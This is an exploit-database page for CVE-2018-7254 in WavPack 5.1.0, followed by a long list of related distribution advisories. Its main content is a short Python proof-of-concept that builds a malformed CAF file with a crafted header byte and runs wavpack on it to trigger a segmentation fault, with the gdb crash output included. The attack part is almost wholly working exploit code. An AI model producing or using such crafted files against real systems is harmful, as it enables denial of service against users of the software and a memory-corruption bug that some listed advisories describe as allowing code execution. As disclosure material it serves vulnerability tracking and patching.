Lucene search
R4xis1337DAY-ID-29860HistoryFeb 21, 2018 - 12:00 a.m.
Wavpack 5.1.0 - Denial of Service Exploit
2018-02-2100:00:00
r4xis
0day.today
12
EPSS
0.017
Percentile
87.8%
Exploit for multiple platform in category dos / poc
# Exploit title: Wavpack 5.1.0 - Denial of Service
# Date: 20.02.2018
# Exploit Author: r4xis
# https://github.com/r4xis
#
# Vendor Homepage: http://www.wavpack.com/
# Software Links: http://www.wavpack.com/downloads.html
# https://github.com/dbry/WavPack
#
#
# Version: Wavpack 5.1.0
# Tested on: Debian 9.3.0 64 bit
# Windows 7 32 bit and 64 bit
# Windows 8 64 bit
#
#
# CVE: CVE-2018-7254
# CVE Details:
# https://nvd.nist.gov/vuln/detail/CVE-2018-7254
# https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=889274
# https://github.com/dbry/WavPack/issues/26
import os
head = "\x63\x61\x66\x66"
version = "\x00\x01"
junk1 = "\x00"*(0xa0-6)
crash = "\x80"
junk2 = "\x00"*100
f=open("poc.caf", 'w')
f.write(head+version+junk1+crash+junk2)
f.close()
os.system("wavpack poc.caf")
'''
Debian gdb output:
Program received signal SIGSEGV, Segmentation fault.
__memmove_sse2_unaligned_erms ()
at ../sysdeps/x86_64/multiarch/../multiarch/memmove-vec-unaligned-erms.S:333
333 ../sysdeps/x86_64/multiarch/../multiarch/memmove-vec-unaligned-erms.S: No such file or directory.
'''
# 0day.today [2018-04-02] #Related
redhatcve
redhatcve
CVE-2018-7254
2018-02-21 20:48:50
alpinelinux
alpinelinux
CVE-2018-7254
2018-02-19 23:29:00
cvelist
cvelist
CVE-2018-7254
2018-02-19 23:00:00
veracode
veracode
Arbitrary Code Execution
2020-05-10 23:27:56
packetstorm
packetstorm
Wavpack 5.1.0 Denial Of Service
2018-02-23 00:00:00
prion
prion
Buffer overflow
2018-02-19 23:29:00
exploitpack
exploitpack
Wavpack 5.1.0 - Denial of Service
2018-02-21 00:00:00
nvd
nvd
CVE-2018-7254
2018-02-19 23:29:00
cve
cve
CVE-2018-7254
2018-02-19 23:29:00
osv
osv
CVE-2018-7254
2018-02-19 23:29:00
wavpack - security update
2018-02-27 00:00:00
debiancve
debiancve
CVE-2018-7254
2018-02-19 23:29:00
ubuntucve
ubuntucve
CVE-2018-7254
2018-02-19 00:00:00
exploitdb
exploitdb
Wavpack 5.1.0 - Denial of Service
2018-02-21 00:00:00
openvas
openvas
Ubuntu: Security Advisory (USN-3578-1)
2018-10-26 00:00:00
Fedora Update for mingw-wavpack FEDORA-2018-5950093e69
2018-03-14 00:00:00
Debian: Security Advisory (DSA-4125-1)
2018-02-26 00:00:00
nessus
nessus
Ubuntu 17.10 : wavpack vulnerabilities (USN-3578-1)
2018-02-23 00:00:00
Debian DSA-4125-1 : wavpack - security update
2018-02-28 00:00:00
Fedora 26 : mingw-wavpack (2018-5950093e69)
2018-03-07 00:00:00
ubuntu
ubuntu
WavPack vulnerabilities
2018-02-22 00:00:00
archlinux
archlinux
[ASA-201802-13] lib32-wavpack: arbitrary code execution
2018-02-23 00:00:00
[ASA-201802-12] wavpack: arbitrary code execution
2018-02-23 00:00:00
fedora
fedora
[SECURITY] Fedora 27 Update: mingw-wavpack-5.1.0-4.fc27
2018-03-06 17:35:08
[SECURITY] Fedora 26 Update: mingw-wavpack-5.1.0-4.fc26
2018-03-06 17:34:15
debian
debian
[SECURITY] [DSA 4125-1] wavpack security update
2018-02-27 20:32:22
[SECURITY] [DSA 4125-1] wavpack security update
2018-02-27 20:32:22
freebsd
freebsd
wavpack -- multiple vulnerabilities
2018-05-09 00:00:00
slackware
slackware
[slackware-security] wavpack
2019-12-19 23:44:00
mageia
mageia
Updated wavpack packages fix security vulnerabilities
2019-01-23 18:50:09
suse
suse
Security update for wavpack (moderate)
2021-01-24 00:00:00
Security update for wavpack (moderate)
2021-01-24 00:00:00